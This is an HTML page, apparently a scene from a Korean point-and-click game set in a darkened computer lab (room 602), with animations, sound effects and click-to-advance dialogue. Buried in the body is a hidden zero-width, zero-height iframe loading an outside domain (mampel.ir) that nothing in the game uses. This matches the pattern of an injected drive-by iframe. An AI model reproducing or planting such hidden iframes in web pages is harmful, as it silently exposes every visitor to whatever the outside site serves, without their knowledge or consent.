<!DOCTYPE html>
<html>
<title>602</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 5%; left: 25%; display:none; }
	#bx img{ width: 70%; height: auto;  }

	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	



	#okk{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }
	
	#oo{bottom: 11%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }

	#soun { position: absolute; z-index: 99;cursor: pointer; top:15%; right: 45%; }
	#soun img{ position: absolute; width: 500px; height: 700px;z-index: 99;cursor: pointer;}


	#turn{bottom: 8%; left: 42%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }


	#tt { position: absolute; z-index: 99; top: 8%; left: 37%; animation: tra 2s alternate; display: none;cursor: pointer; }
	#tt img{ position: absolute; z-index: 99; width: 500px; height: auto; }	

	#lefts{top: 50%; left: 3%; position: absolute; cursor: pointer; animation: here 3s alternate;}
	#lefts img{width: 40px; height: auto; }

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }
@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}


@keyframes backk{
			0%{bottom: 11%;}
			
			100%{bottom: 8%;}
		}			


@keyframes here{
			0%{left: 6%;}
			
			100%{left: 3%;}
		}
		

@keyframes tra{
			0%{opacity: 0}
			
			100%{opacity: 1}
		}


h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 21ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(15, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}


h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 62ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 2s steps(30, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}





</style>

<head>
	<title></title>
</head>

<body>


	<div id="container">
	 <h3 id="poom">컴퓨터 실기실2이다. 며칠 전부터 여긴 전기가 들어오지 않는다.</h3>
	 	<h1 id="poom2">들어갈 필요가 없다.</h1>
	 		
	
	 	<audio id="walk">
		<source src="walk.mp3" type="audio/mpeg"autoplay="true" preload="auto">
	</audio>
	
	
	<audio id="door">
		<source src="door.mp3" type="audio/mpeg">
	</audio>

	<audio id="but">
		<source src="but.mp3" type="audio/mpeg">
	</audio>





<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>


	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/602/">
	<div id="turn">
		<img src="turn.png">
	</div>
</a>
		<a href="https://seoojing.github.io/professor/">
	<div id="lefts">
		<img src="here.png">
	</div>
		</a>

	<div id="bx">
		<img src="boox.png">
	</div>
	<div id="soun">
		<img src="blank.png">
	</div>
	
	<div id="oo">
		<img src="won.png">
	</div>

	<div id="okk">
		<img src="okk.png">
	</div>

	<div id="tt">
		<img src="sig.png">
	</div>

	
</div>
<script type="text/javascript">



var bbPlay = 0;

window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){drop.play(); walk.play();  }
}

	
var toggle = "off";
	var clickNumber = 0;
	soun.onclick = function(){
		
			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			soun.style.display = "none"
			but.play();
			door.play();	}

	
	oo.onclick = function(){
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"			
			but.play();
			okk.style.display = "inline"}





	okk.onclick = function(){
		but.play();
			poom2.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			tt.style.display = "none"}










</script>
</body>
</html>
